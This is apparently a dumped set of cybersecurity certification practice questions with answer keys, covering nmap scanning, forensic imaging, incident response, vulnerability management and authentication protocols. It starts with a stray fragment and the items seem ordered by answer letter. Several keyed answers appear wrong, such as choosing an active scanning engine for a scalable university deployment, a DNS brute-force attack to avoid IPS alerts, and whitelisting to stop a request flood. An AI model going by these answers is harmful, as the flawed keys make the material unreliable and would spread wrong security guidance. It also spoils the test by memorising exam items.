C. Sets the block size
Rory is about to conduct forensics on a virtual machine. Which of the following processes should be used to ensure that all of the data is acquired forensically? A. Perform a live acquisition of the virtual machine's memory B. Suspend the machine and make a forensic copy of the drive it resides on C. Suspend the machine and copy the contents of the directory it resides in D. Shutdown the virtual machine off and make a forensic copy of its disk image
C. Suspend the machine and copy the contents of the directory it resides in
What authentication protocol was designed by Cisco to provide authentication, authorization, and accounting services? A. RADIUS B. CHAP C. TACACS+ D. Kerberos
C. TACACS+
Which of the following types of scans are useful for probing firewall rules? A. TCP SYN B. TCP RST C. TCP ACK D. XMAS TREE
C. TCP ACK
An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server's BIOS had been modified by rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed? A. Anti-malware application B. Host-based IDS C. TPM data sealing D. File integrity monitoring
C. TPM data sealing
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework? A. Applications architecture B. Business architecture C. Technical architecture D. Data architecture
C. Technical architecture
An analyst has been asked to perform an architectural review and uses a view that focuses on the technologies, settings, and configurations used in the architecture. What view is the analyst using? A. Operational view B. Acquisition view C. Technical view D. Logical view
C. Technical view
What insecure protocol should NOT be used? A. SFTP B. SSH C. Telnet D. HTTPS
C. Telnet
While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation? A. The analyst is not using the standard approved browser. B. The analyst accidentally clicked a link related to the indicator. C. The analyst has prefetch enabled on the browser in use. D. The alert is unrelated to the analyst's search.
C. The analyst has prefetch enabled on the browser in use
Given the following output from a Linux machine: file2cable -i eth0 -f file.pcap Which of the following BEST describes what a security analyst is trying to accomplish? A. The analyst is attempting to measure bandwidth utilization on interface eth0. B. The analyst is attempting to capture traffic on interface eth0. C. The analyst is attempting to replay captured data from a PCAP file. D. The analyst is attempting to capture traffic for a PCAP file. E. The analyst is attempting to use a protocol analyzer to monitor network traffic.
C. The analyst is attempting to replay captured data from a PCAP file
A security analyst has created an image of a drive from an incident. Which of the following describes what the analyst should do NEXT? A. The analyst should create a backup of the drive and then hash the drive. B. The analyst should begin analyzing the image and begin to report findings. C. The analyst should create a hash of the image and compare it to the original drive's hash. D. The analyst should create a chain of custody document and notify stakeholders.
C. The analyst should create a hash of the image and compare it to the original drive's hash
Which of the following could be directly impacted by an unpatched vulnerability in vSphere ESXi? A. The organization's physical routers B. The organization's mobile devices C. The organization's virtual infrastructure D. The organization's VPN
C. The organization's virtual infrastructure
A system administrator recently deployed and verified the installation of a critical patch issued by the company's primary OS vendor. This patch was supposed to remedy a vulnerability that would allow an adversary to remotely execute code from over the network. However, the administrator just ran a vulnerability assessment of networked systems, and each of them still reported having the same vulnerability. Which of the following is the MOST likely explanation for this? A. The administrator entered the wrong IP range for the assessment. B. The administrator did not wait long enough after applying the patch to run the assessment. C. The patch did not remediate the vulnerability. D. The vulnerability assessment returned false positives.
C. The patch did not remediate the vulnerability
A vulnerability analyst needs to identify all systems with unauthorized web servers on the 10.1.1.0/24 network. The analyst uses the following default Nmap scan: nmap -sV -p 1-65535 10.1.1.0/24 Which of the following would be the result of running the above command? A. This scan checks all TCP ports. B. This scan probes all ports and returns open ones. C. This scan checks all TCP ports and returns versions. D. This scan identifies unauthorized servers.
C. The scan checks all TCP ports and returns versions
A security analyst begins to notice the CPU utilization from a sinkhole has begun to spike. Which of the following describes what may be occurring? A. Someone has logged on to the sinkhole and is using the device. B. The sinkhole has begun blocking suspect or malicious traffic. C. The sinkhole has begun rerouting unauthorized traffic. D. Something is controlling the sinkhole and causing CPU spikes due to malicious utilization.
C. The sinkhole has begun rerouting unauthorized traffic
A security analyst is preparing for the company's upcoming audit. Upon review of the company's latest vulnerability scan, the security analyst finds the following open issues: (see image Q-225) Which of the following vulnerabilities should be prioritized for remediation FIRST? A. ICMP timestamp request remote date disclosure B. Anonymous FTP enabled C. Unsupported web server detection D. Microsoft Windows SMB service enumeration via \srvsvc
C. Unsupported web server detection
An analyst is troubleshooting a PC that is experiencing high processor and memory consumption. Investigation reveals the following processes are running on the system: ✑ lsass.exe ✑ csrss.exe ✑ wordpad.exe ✑ notepad.exe Which of the following tools should the analyst utilize to determine the rogue process? A. Ping 127.0.0.1. B. Use grep to search. C. Use Netstat. D. Use Nessus.
C. Use Netstat
After completing a vulnerability scan, the following output was noted: CVE-2011-3389 QID 42366-SSLv3.9/TLSv1.0 Protocol weak CBC mode Server side vulnerability Check with: openssl s_client -connect qualys.jive.mobuile.com:443-tlsl-cipher "AES:CAMELLIA:SEED:3DES;DES" Which of the following vulnerabilities has been identified? A. PKI transfer vulnerability. B. Active Directory encryption vulnerability. C. Web application cryptography vulnerability. D. VPN tunnel vulnerability.
C. Web application cryptography vulnerability
A cybersecurity analyst is reviewing log data and sees the output below: POST:// payload.php HTTP/1.1 HOST: localhost Accept: */* Referrer: http://localhost ************* HTTP /1.1 403 Forbidden connection : close Which of the following technologies MOST likely generated this log? A. Stateful inspection firewall B. Network-based intrusion detection system C. Web application firewall D. Host-based intrusion detection system
C. Web application firewall
A company has recently launched a new billing invoice website for a few key vendors. The cybersecurity analyst is receiving calls that the website is performing slowly and the pages sometimes time out. The analyst notices the website is receiving millions of requests, causing the service to become unavailable. Which of the following can be implemented to maintain the availability of the website? A. VPN B. Honeypot C. Whitelisting D. DMZ E. MAC filtering
C. Whitelisting
An analyst wants to use a command line tool to identify open ports and running services on a host along with the application that is associated with those services and ports. Which of the following should the analyst use? A. Wireshark B. Qualys C. netstat D. nmap E. ping
C. netstat
A cybersecurity professional wants to determine if a web server is running on a remote host with the IP address 192.168.1.100. Which of the following can be used to perform this task? A. nc 192.168.1.100 -1 80 B. ps aux 192.168.1.100 C. nmap 192.168.1.100 -p 80 -A D. dig www 192.168.1.100 E. ping -p 80 192.168.1.100
C. nmap 192.168.1.100 -p 80 -A
Which of the following is the default nmap scan type when you do not provide a scan-type flag when issuing the command? A. A TCP FIN scan B. A UDP scan C. A TCP connect scan D. A TCP SYN scan
D. A TCP SYN scan
A cybersecurity analyst is working at a college that wants to increase the security of its network by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must be able to scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements? A. Combination of cloud-based and server-based scanning engines B. Combination of server-based and agent-based scanning engines C. Passive scanning engine located at the core of the network infrastructure D. Active scanning engine installed on the enterprise console
D. Active scanning engine installed on the enterprise console
The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files: Locky.js, xerty.ini, xerty.lib Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices? A. Disable access to the company VPN. B. Move the files from the NAS to a cloud-based storage solution. C. Set permissions on file shares to read-only. D. Add the URL included in the .js file to the company's web proxy filter.
D. Add the URL included in the .js file to the company's web proxy filter
Which one of the following methods would provide the most current and accurate information about any vulnerabilities present in a system with a misconfigured operating system setting? A. Scheduled vulnerability scanning B. Continuous vulnerability scanning C. On-demand vulnerability scanning D. Agent-based monitoring
D. Agent-based monitoring
A university wants to increase the security posture of its network by implementing vulnerability scans of both centrally managed and student/employee laptops. The solution should be able to scale, provide minimum false positives and high accuracy of results, and be centrally managed through an enterprise console. Which of the following scanning topologies is BEST suited for this environment? A. A passive scanning engine located at the core of the network infrastructure B. A combination of cloud-based and server-based scanning engines C. A combination of server-based and agent-based scanning engines D. An active scanning engine installed on the enterprise console
D. An active scanning engine installed on the enterprise console
What two techniques are commonly used by port and vulnerability scanners to perform service and system identification? A. Comparing response fingerprints and registry scanning B. Using the nslookup utility and UDP response timing C. Banner grabbing and UDP response timing D. Banner grabbing and comparing response fingerprints
D. Banner grabbing and comparing response fingerprints
Nick is participating in a security exercise as part of the network defense team for his organization. Which team is Nick playing on? A. Yellow Team B. Red Team C. White Team D. Blue Team
D. Blue Team
A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application is accessible over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability? A. Rename the URL to a more obscure name, whitelist all corporate IP blocks, and require two-factor authentication. B. Change the default password, whitelist specific source IP addresses, and require two-factor authentication. C. Whitelist all corporate IP blocks, require an alphanumeric passphrase for the default password, and require two-factor authentication. D. Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.
D. Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication
A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. Which of the following methods is NOT a means of unlocking the volume? A. Retrieve the key from memory while the volume is mounted B. Extract the keys from iCloud C. Acquire the recovery key D. Conduct a brute-force attack against the FileVault2 encryption
D. Conduct a brute-force attack against the FileVault2 encryption
A cybersecurity consultant is reviewing the following output from a vulnerability scan against a newly installed MS SQL Server 2012 that is slated to go into production in one week: (see image Q-105) Based on the above information, which of the following should the system administrator do? (Choose two.) A. Verify the vulnerability using penetration testing tools or proof-of-concept exploits. B. Review the references to determine if the vulnerability can be remotely exploited. C. Mark the result as a false positive so it will show in subsequent scans. D. Configure a network-based ACL at the perimeter firewall to protect the MS SQL port. E. Implement the proposed solution by installing Microsoft patch Q316333.
D. Configure a network-based ACL at the perimeter firewall to protect the MS SQL port E. Implement the proposed solution by installing Microsoft patch Q316333
The security operations team is conducting a mock forensics investigation. Which of the following should be the FIRST action taken after seizing a compromised workstation? A. Activate the escalation checklist B. Implement the incident response plan C. Analyze the forensic image D. Perform evidence acquisition
D. Perform evidence acquisition
Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, his security team has noticed there has been a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events? A. Cross-site request forgery B. Rootkit C. SQL injection D. Cross-site scripting
D. Cross-site scripting
An investigation showed a worm was introduced from an engineer's laptop. It was determined the company does not provide engineers with company-owned laptops, which would be subject to company policy and technical controls. Which of the following would be the MOST secure control to implement? A. Deploy HIDS on all engineer-provided laptops, and put a new router in the management network. B. Implement role-based group policies on the management network for client access. C. Utilize a jump box that is only allowed to connect to clients from the management network. D. Deploy a company-wide approved engineering workstation for management access.
D. Deploy a company-wide approved engineering workstation for management access
When network administrators observe an increased amount of web traffic without an increased number of financial transactions, the company is MOST likely experiencing which of the following attacks? A. Bluejacking B. ARP cache poisoning C. Phishing D. DoS
D. DoS
A security analyst notices PII has been copied from the customer database to an anonymous FTP server in the DMZ. Firewall logs indicate the customer database has not been accessed from the anonymous FTP server. Which of the following departments should make a decision about pursuing further investigation? (Choose two.) A. Human resources B. Public relations C. Legal D. Executive management E. IT management
D. Executive management E. IT management
A cybersecurity analyst is currently investigating a server outage. The analyst has discovered the following value was entered for the username: 0xbfff601a. Which of the following attacks may be occurring? A. Buffer overflow attack B. Man-in-the-middle attack C. Smurf attack D. Format string attack E. Denial of service attack
D. Format String Attack
Which security control allows a Windows system administrator to efficiently manage system configuration settings across a large number of systems? A. Patch management B. HIPS C. Anti-malware D. GPO
D. GPO
The Chief Information Security Officer (CISO) has asked the security staff to identify a framework on which to base the security program. The CISO would like to achieve a certification showing the security program meets all required best practices. Which of the following would be the BEST choice? A. OSSIM B. SDLC C. SANS D. ISO
D. ISO
An organization is requesting the development of a disaster recovery plan. The organization has grown and so has its infrastructure. Documentation, policies, and procedures do not exist. Which of the following steps should be taken to assist in the development of the disaster recovery plan? A. Conduct a risk assessment. B. Develop a data retention policy. C. Execute vulnerability scanning. D. Identify assets.
D. Identify assets
A cybersecurity analyst is reviewing the current BYOD security posture. The users must be able to synchronize their calendars, email, and contacts to a smartphone or other personal device. The recommendation must provide the most flexibility to users. Which of the following recommendations would meet both the mobile data protection efforts and the business requirements described in this scenario? A. Develop a minimum security baseline while restricting the type of data that can be accessed. B. Implement a single computer configured with USB access and monitored by sensors. C. Deploy a kiosk for synchronizing while using an access list of approved users. D. Implement a wireless network configured for mobile device access and monitored by sensors.
D. Implement a wireless network configured for mobile device access and monitored by sensors
During an investigation, a computer is being seized. Which of the following is the FIRST step the analyst should take? A. Power off the computer and remove it from the network. B. Unplug the network cable and take screenshots of the desktop. C. Perform a physical hard disk image. D. Initiate chain-of-custody documentation.
D. Initiate chain-of-custody documentation
A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs: https://test.diontraining.com/profile.php?userid=1546 https://test.diontraining.com/profile.php?userid=5482 https://test.diontraining.com/profile.php?userid=3618 What type of vulnerability does this website have? A. Race condition B. Improper error handling C. Weak or default configurations D. Insecure direct object reference
D. Insecure direct object reference
You just finished conducting a remote scan of a class C network block using the following command "nmap -sS 202.15.73.0/24". The results only showed a single web server. Which of the following techniques would allow you to gather additional information about the network? A. Use an IPS evasion technique B. Scan using the -p 1-65535 flag C. Use a UDP scan D. Perform a scan from on-site
D. Perform a scan from on-site
You have been asked to recommend a capability to monitor all of the traffic entering and leaving the corporate network's default gateway. Additionally, the company's CIO requests the ability to block certain types of content before it leaves the network based on operational priorities. Which of the following solutions should you recommend to meet these requirements? A. Configure IP filtering on the internal and external interfaces of the router B. Installation of a NIPS on both the internal and external interfaces of the router C. Install a firewall on the router's internal interface and a NIDS on the router's external interface D. Install a NIPS on the internal interface and a firewall on the external interface of the router
D. Install a NIPS on the internal interface and a firewall on the external interface of the router
A nuclear facility manager determined the need to monitor utilization of water within the facility. A startup company just announced a state-of-the-art solution to address the need for integrating the business and ICS network. The solution requires a very small agent to be installed on the ICS equipment. Which of the following is the MOST important security control for the manager to invest in to protect the facility? A. Run a penetration test on the installed agent. B. Require that the solution provider make the agent source code available for analysis. C. Require thorough guides for administrator and users. D. Install the agent for a week on a test system and monitor the activities.
D. Install the agent for a week on a test system and monitor the activities
An analyst has initiated an assessment of an organization's security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Choose two.) A. Fingerprinting B. DNS query log reviews C. Banner grabbing D. Internet searches E. Intranet portal reviews F. Sourcing social network sites G. Technical control audits
D. Internet searches F. Sourcing social network sites
An organization wants to choose an authentication protocol that can be used over an insecure network without having to implement additional encryption services. Which of the following protocols should they choose? A. RADIUS B. TACACS+ C. TACACS D. Kerberos
D. Kerberos
A security analyst discovers a network intrusion and quickly solves the problem by closing an unused port. Which of the following should be completed? A. Vulnerability report B. Memorandum of agreement C. Reverse-engineering incident report D. Lessons learned report
D. Lessons learned report
Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated, in addition to incident response effectiveness and any identified gaps needing improvement? A. Forensic analysis report B. Chain of custody report C. Trends analysis report D. Lessons learned report
D. Lessons learned report
Annah is deploying a new application that she received from a vendor, but she is unsure if the hardware is adequate to support a large number of users during peak usage periods. What type of testing could Annah perform to determine if the application will support the required number of users? A. Regression Testing B. Fuzz Testing C. User Acceptance Testing D. Load Testing
D. Load Testing
Stephane was asked to assess the technical impact of reconnaissance performed against his organization. He has discovered that a third party has been performing reconnaissance by querying the organization's WHOIS data. Which category of technical impact should he classify this as? A. Medium B. High C. Critical D. Low
D. Low
Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company A's conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company B's network. The security architect for Company A wants to ensure partners from Company B are able to gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports. Which of the following can be employed to allow this? A. ACL B. SIEM C. MAC D. NAC E. SAML
D. NAC
Randy is preparing his organization for their required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this type of scan? A. Any qualified individual B. Anyone C. Only employees of the organization D. Only an approved scanning vendor
D. Only an approved scanning vendor
Which type of monitoring would utilize a network tap? A. SNMP B. Router-based C. Active D. Passive
D. Passive
Marta's organization is concerned that a user's account could remain vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability? A. Minimum password length B. Password complexity C. Password history D. Password expiration
D. Password expiration
A security analyst performed a review of an organization's software development life cycle. The analyst reports that the life cycle does not contain a phase in which team members evaluate and provide critical feedback on another developer's code. Which of the following assessment techniques is BEST for describing the analyst's report? A. Architectural evaluation B. Waterfall C. Whitebox testing D. Peer review
D. Peer review
A project lead is reviewing the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization's internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The statement of work specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indicating weaknesses in the infrastructure. The scope of activity as described in the statement of work is an example of: A. session hijacking B. vulnerability scanning C. social engineering D. penetration testing E. friendly DoS
D. Penetration testing
As part of the reconnaissance stage of a penetration test, Kumar wants to retrieve some information about an organization's network infrastructure without causing an IPS alert. Which of the following is his best course of action? A. Use an nmap stealth scan B. Use an nmap ping sweep C. Perform a DNS zone transfer D. Perform a DNS brute-force attack
D. Perform a DNS brute-force attack
A threat intelligence analyst is researching a new indicator of compromise. At the same time, the web proxy server generated an alert for this same indicator of compromise. When asked about this alert, the analyst insists that they did not visit any of the related sites, but instead they were simply listed in the results page of their search engine query. Which of the following is the BEST explanation for what has occurred? A. A link related to the indicator was accidentally clicked by the analyst B. Alert is unrelated to the search that was conducted C. The standard approved browser was not being used by the analyst D. Prefetch is enabled on the analyst's web browser
D. Prefetch is enabled on the analyst web browser
What party in a federation provides services to members of the federation? A. IdP B. AP C. IP D. RP
D. RP
In order to meet regulatory compliance objectives for the storage of PHI, vulnerability scans must be conducted on a continuous basis. The last completed scan of the network returned 5,682 possible vulnerabilities. The Chief Information Officer (CIO) would like to establish a remediation plan to resolve all known issues. Which of the following is the BEST way to proceed? A. Attempt to identify all false positives and exceptions, and then resolve all remaining items. B. Hold off on additional scanning until the current list of vulnerabilities has been resolved. C. Place assets that handle PHI in a sandbox environment, and then resolve all vulnerabilities. D. Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first.
D. Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first
A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation? A. Memorandum of understanding B. Acceptable use policy C. Service level agreement D. Rules of engagement
D. Rules of engagement
A company invested ten percent of its entire annual budget in security technologies. The Chief Information Officer (CIO) is convinced that, without this investment, the company will risk being the next victim of the same cyber attack its competitor experienced three months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get their jobs done. Which of the following will eliminate the risk introduced by this practice? A. Invest in and implement a solution to ensure non-repudiation B. Force a daily password change C. Send an email asking users not to share their credentials D. Run a report on all users sharing their credentials and alert their managers of further actions
D. Run a report on all users sharing their credentials and alert their managers of further actions
Which of the following is MOST effective for correlation analysis by log for threat management? A. PCAP B. SCAP C. IPS D. SIEM
D. SIEM
A security analyst was asked to join an outage call for a critical web application. The web middleware support team determined the web server is running and having no trouble processing requests; however, some investigation has revealed firewall denies to the web server that began around 1:00 a.m. that morning. An emergency change was made to enable the access, but management has asked for a root cause determination. Which of the following would be the BEST next step? A. Install a packet analyzer near the web server to capture sample traffic to find anomalies. B. Block all traffic to the web server with an ACL. C. Use a port scanner to determine all listening ports on the web server. D. Search the logging servers for any rule changes.
D. Search the logging servers for any rule changes
After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment? A. Cross training B. Succession planning C. Automated reporting D. Separation of duties
D. Separation of duties
Jonathan's team completed the first phase of their incident response process. They are currently assessing the time to recover from the incident. Using the NIST recoverability effort categories, the team has decided that they can predict the time to recover, but this requires additional resources. How should he categorize this using the NIST model? A. Extended B. Regular C. Non-recoverable D. Supplemented
D. Supplemented
Datacenter access is controlled with proximity badges that record all entries and exits from the datacenter. The access records are used to identify which staff members accessed the data center in the event of equipment theft. Which of the following MUST be prevented in order for this policy to be effective? A. Password reuse B. Phishing C. Social engineering D. Tailgating
D. Tailgating
A security analyst is reviewing logs and discovers that a company-owned computer issued to an employee is generating many alerts and warnings. The analyst continues to review the log events and discovers that a non-company-owned device from a different, unknown IP address is generating the same events. The analyst informs the manager of these findings, and the manager explains that these activities are already known and part of an ongoing event. Given this scenario, which of the following roles are the analyst, the employee, and the manager filling? A. The analyst is red team. The employee is blue team. The manager is white team. B. The analyst is white team. The employee is red team. The manager is blue team. C. The analyst is red team. The employee is white team. The manager is blue team. D. The analyst is blue team. The employee is red team. The manager is white team.
D. The analyst is blue team, the employee is red team, the manager is white team
You are creating a script to filter some logs so that you can detect any suspected malware beaconing. Which of the following is NOT a typical means of identifying a malware beacon's behavior on the network? A. The removal of known traffic B. The beacon's persistence C. The beaconing interval D. The beacon's protocol
D. The beacon's protocol
A company has been a victim of multiple volumetric DoS attacks. Packet analysis of the offending traffic shows the following: (see image Q-121) Which of the following mitigation techniques is MOST effective against the above attack? A. The company should contact the upstream ISP and ask that RFC1918 traffic be dropped. B. The company should implement a network-based sinkhole to drop all traffic coming from 192.168.1.1 at their gateway router. C. The company should implement the following ACL at their gateway firewall: DENY IP HOST 192.168.1.1 170.43.30.0/24. D. The company should enable the DoS resource starvation protection feature of the gateway NIPS.
D. The company should enable the DoS resource starvation protection feature of the gateway NIPS
The business has been informed of a suspected breach of customer data. The internal audit team, in conjunction with the legal department, has begun working with the cybersecurity team to validate the report. To which of the following response processes should the business adhere during the investigation? A. The security analysts should not respond to internal audit requests during an active investigation B. The security analysts should report the suspected breach to regulators when an incident occurs C. The security analysts should interview system operators and report their findings to the internal auditors D. The security analysts should limit communication to trusted parties conducting the investigation
D. The security analysts should limit communication to trusted parties conducting the investigation
A malware infection spread to numerous workstations within the marketing department. The workstations were quarantined and replaced with machines. Which of the following represents a FINAL step in the eradication of the malware? A. The workstations should be isolated from the network. B. The workstations should be donated for reuse. C. The workstations should be reimaged. D. The workstations should be patched and scanned.
D. The workstations should be patched and scanned
You have been asked to conduct a forensic disk image on an internal 500 GB hard drive. You connect a write blocker to the drive and begin to image it using dd to copy the contents to an external 500 GB USB hard drive. Before completing the image, the tool reports that the imaging failed. Which of the following is most likely the reason for the imaging failure? A. The data cannot be copied using the RAW format B. The source drive is encrypted with BitLocker C. The data on the source drive was modified during the imaging D. There are bad sectors on the destination drive
D. There are bad sectors on the destination drive
A technician receives the following security alert from the firewall's automated system: (see image Q-143) After reviewing the alert, which of the following is the BEST analysis? A. This alert is a false positive because DNS is a normal network function. B. This alert indicates a user was attempting to bypass security measures using dynamic DNS. C. This alert was generated by the SIEM because the user attempted too many invalid login attempts. D. This alert indicates an endpoint may be infected and is potentially contacting a suspect host.
D. This alert indicates an endpoint may be infected and is potentially contacting a suspected host
The Chief Security Officer (CSO) has requested a vulnerability report of systems on the domain, identifying those running outdated OSs. The automated scan reports are not displaying OS version details, so the CSO cannot determine risk exposure levels from vulnerable systems. Which of the following should the cybersecurity analyst do to enumerate OS information as part of the vulnerability scanning process in the MOST efficient manner? A. Execute the ver command B. Execute the nmap -p command C. Use Wireshark to export a list D. Use credentialed configuration
D. Use credentialed configuration
Which of the following vulnerabilities involves leveraging access from a single virtual machine to other machines on a hypervisor? A. VM sprawl B. VM migration C. VM data remnant D. VM escape
D. VM escape
A cybersecurity consultant found common vulnerabilities across the following services used by multiple servers at an organization: VPN, SSH, and HTTPS. Which of the following is the MOST likely reason for the discovered vulnerabilities? A. Leaked PKI private key B. Vulnerable version of OpenSSL C. Common initialization vector D. Weak level of encryption entropy E. Vulnerable implementation of PEAP
D. Weak level of encryption entropy
Which of the following is a vulnerability when using Windows as a host OS for virtual machines? A. Windows requires frequent patching. B. Windows virtualized environments are typically unstable. C. Windows requires hundreds of open firewall ports to operate. D. Windows is vulnerable to the "ping of death".
D. Windows is vulnerable to the "ping of death"
What is NOT a vulnerability scanning tool? A. Nexpose B. Nessus C. QualysGuard D. Zap
D. Zap
Which of the following tools is considered a web application scanner? A. Qualys B. Nessus C. OpenVAS D. Zap
D. Zap
What tool is used to collect memory data for forensic analysis on a Linux system? A. EnCase B. DumpIt C. WinPMem D. fmem
D. fmem
Company A's security policy states that only PKI authentication should be used for all SSH accounts. A security analyst from Company A is reviewing the following auth.log and configuration settings: (see image Q-237) Which of the following changes should be made to the following sshd_config file to establish compliance with the policy? A. Change PermitRootLogin no to #PermitRootLogin yes B. Change ChallengeResponseAuthentication yes to ChallengeResponseAuthentication no C. Change PubkeyAuthentication yes to #PubkeyAuthentication yes D. Change #AuthorizedKeysFile $h/.ssh/authorized_keys to AuthorizedKeysFile $h/.ssh/authorized_keys E. Change PasswordAuthentication yes to PasswordAuthentication no
E. Change PasswordAuthentication yes to PasswordAuthentication no
A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company's sensitive financial management application by default. Which of the following is the BEST course of action? A. Follow the incident response plan for the introduction of new accounts B. Disable the user accounts C. Remove the accounts' access privileges to the sensitive application D. Monitor the outbound traffic from the application for signs of data exfiltration E. Confirm the accounts are valid and ensure role-based permissions are appropriate
E. Confirm the accounts are valid and ensure role-based permissions are appropriate
What containment technique is the strongest possible response to an incident? A. Segmentation B. Isolating affected systems C. Isolating the attacker D. Removal
D. Removal